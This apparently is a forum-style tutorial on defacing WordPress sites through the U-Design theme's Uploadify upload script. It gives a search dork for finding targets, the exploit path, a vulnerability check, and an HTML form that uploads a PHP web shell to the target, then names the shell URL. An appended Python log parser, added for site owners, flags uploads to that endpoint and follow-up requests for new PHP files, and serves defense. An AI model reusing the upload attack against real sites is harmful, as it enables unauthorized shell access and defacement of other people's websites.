
Defacing with the WordPress U-Design Theme Exploit




#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress

Dork: inurl:themes/u-design/ < develop this further

Exploit: /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php


If the target is vulnerable, the page appears blank (completely white) when the exploit URL is opened.


Save the CSRF form with an .html extension (x.html):
<form method="POST" action="http://www.site.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data">
  <input type="file" name="Filedata" />
  <button>Upload</button><br />
</form>


Shell access: site.com/myshell.php
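
For site owners, the sequence described above (a request to uploadify.php, then a request for a new PHP file in the web root) leaves a recognizable trail in the web-server access log. The Python below is an added example, not part of the original post; it assumes Apache/nginx common or combined log format, and the allow-list of stock root scripts, the function name and the sample log lines are constructed for illustration.

```python
import re

# Endpoint named on the page; compared lower-cased with the query string removed.
UPLOADIFY = "/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php"
# Assumption: PHP scripts a stock WordPress install keeps in the web root.
KNOWN_ROOT_PHP = {"index.php", "wp-activate.php", "wp-blog-header.php", "wp-comments-post.php",
                  "wp-config.php", "wp-cron.php", "wp-links-opml.php", "wp-load.php", "wp-login.php",
                  "wp-mail.php", "wp-settings.php", "wp-signup.php", "wp-trackback.php", "xmlrpc.php"}
# Common/combined log format: ip ident user [time] "METHOD target proto" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')
ROOT_PHP = re.compile(r"/([^/]+\.php)")


def find_uploadify_activity(lines):
    """Return (kind, ip, time, target) tuples: 'upload', 'probe' or 'followup'."""
    uploaders = set()  # clients that already POSTed successfully to the endpoint
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        ip, when, method, target, status = m.groups()
        path = target.split("?", 1)[0].lower()
        ok = int(status) < 400
        if path == UPLOADIFY:
            if method == "POST" and ok:
                uploaders.add(ip)
                findings.append(("upload", ip, when, target))
            else:  # any other request to the endpoint, including blocked ones
                findings.append(("probe", ip, when, target))
        elif ip in uploaders and ok:
            root = ROOT_PHP.fullmatch(path)
            if root and root.group(1) not in KNOWN_ROOT_PHP:
                findings.append(("followup", ip, when, target))
    return findings


# Constructed sample log lines (documentation IP ranges, made-up file name and dates).
SAMPLE = [
    f'203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET {UPLOADIFY} HTTP/1.1" 200 0',
    f'203.0.113.7 - - [01/Jan/2024:10:01:40 +0000] "POST {UPLOADIFY} HTTP/1.1" 200 0',
    '198.51.100.20 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:02:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:02:11 +0000] "GET /x9.php HTTP/1.1" 200 312',
    f'198.51.100.20 - - [01/Jan/2024:10:05:00 +0000] "POST {UPLOADIFY} HTTP/1.1" 403 199',
]

for finding in find_uploadify_activity(SAMPLE):
    print(*finding, sep="  ")
```

A "followup" finding only means the same client requested an unfamiliar root-level PHP file after posting to the endpoint; confirm it by checking whether that file exists on disk and when it was created.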
